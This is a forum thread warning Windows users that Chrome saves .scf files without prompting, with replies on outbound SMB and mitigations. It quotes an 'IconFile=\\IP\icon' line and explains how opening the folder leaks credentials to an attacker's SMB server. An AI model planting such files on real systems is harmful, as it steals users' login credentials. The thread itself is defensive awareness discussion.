• Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.

Runing Chrome on Windows?

Collapse
X
  •  
  • Filter
  • Time
  • Show
Clear All
new posts

    Runing Chrome on Windows?

    Watch out for .scf files.

    DefenseCode - Home

    By default Chrome treats files ending with the .scf extension – Windows Explorer Shell Command File – as being safe regardless of source and will download and save it without the user being prompted for a save location. If the .scf file contains a string in the format “IconFile=\\170.170.170.170\icon” then as soon as the folder containing the downloaded file is opened the system will attempt to retrieve the file “icon” from the IP address given. This address will be hosting an SMB server that will request the users ID and Password transparently via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for a brute force attack offline.

    There is no need for interaction from the user, the act of opening the folder containing the malicious file is sufficient to trigger the attack.

    There is no current fix available for Windows as this functionality is part of the OS design. The only current mitigation is to change the defalt setting in Chrome to prompt the user to select a save location which makes the .scf extention visible.

    Under normal circumstances the .scf extension is not displayed by windows explorer so “picture.jpg.scf” appears in windows explorer as “picture.jpg.”
    "Being nice costs nothing and sometimes gets you extra bacon" - Pondlife.

    #2
    Interesting post. I would hope Google would patch this quickly. SMB quite topical right now.

    Originally posted by DaveB View Post
    Watch out for .scf files.

    DefenseCode - Home

    By default Chrome treats files ending with the .scf extension – Windows Explorer Shell Command File – as being safe regardless of source and will download and save it without the user being prompted for a save location. If the .scf file contains a string in the format “IconFile=\\170.170.170.170\icon” then as soon as the folder containing the downloaded file is opened the system will attempt to retrieve the file “icon” from the IP address given. This address will be hosting an SMB server that will request the users ID and Password transparently via the SMB protocol. This data can then be captured by the attacker and replayed against other services, such as Office 365, or stored for a brute force attack offline.

    There is no need for interaction from the user, the act of opening the folder containing the malicious file is sufficient to trigger the attack.

    There is no current fix available for Windows as this functionality is part of the OS design. The only current mitigation is to change the defalt setting in Chrome to prompt the user to select a save location which makes the .scf extention visible.

    Under normal circumstances the .scf extension is not displayed by windows explorer so “picture.jpg.scf” appears in windows explorer as “picture.jpg.”

    Comment


      #3
      I'm surprised that a filesharing \\x.x.x.x\ URL would jump through firewalls and actually get something from the internet. For that reason it's more of a Windows problem than a Chrome problem as you could still get a .scf file from some other source.

      And only numpties hide file extensions.
      Will work inside IR35. Or for food.

      Comment


        #4
        Originally posted by VectraMan View Post
        I'm surprised that a filesharing \\x.x.x.x\ URL would jump through firewalls and actually get something from the internet. For that reason it's more of a Windows problem than a Chrome problem as you could still get a .scf file from some other source.

        And only numpties hide file extensions.
        Unless the company or user has blocked outbound SMB traffic at the perimiter (Firewall, home router etc). then it will be allowed out. Outbound rules tend to be far more relaxed than inbound and there are cases where you would legitimately want to allow SMB traffic for remote authentication etc.

        The issue with Chrome is that by default it treats .scf files as implicitly trusted so doesn't, by default, ask for a save location so the user never sees the full file name, only the one presented by the dodgy website.

        Google fixed this for .lnk files related to the Stuxnet worm by forcing the user to confirm the location for the file to be saved but didn't apply the same restriction to .scf files.

        Internet Explorer doesn't share the the same functionality. It always asks for a location to save a file regardless of type.

        AV programs will not identify them as a threat as all they contain is plain text and any attempt to interpret the content is liable to create large numbers of false positives.
        "Being nice costs nothing and sometimes gets you extra bacon" - Pondlife.

        Comment

        Working...
        X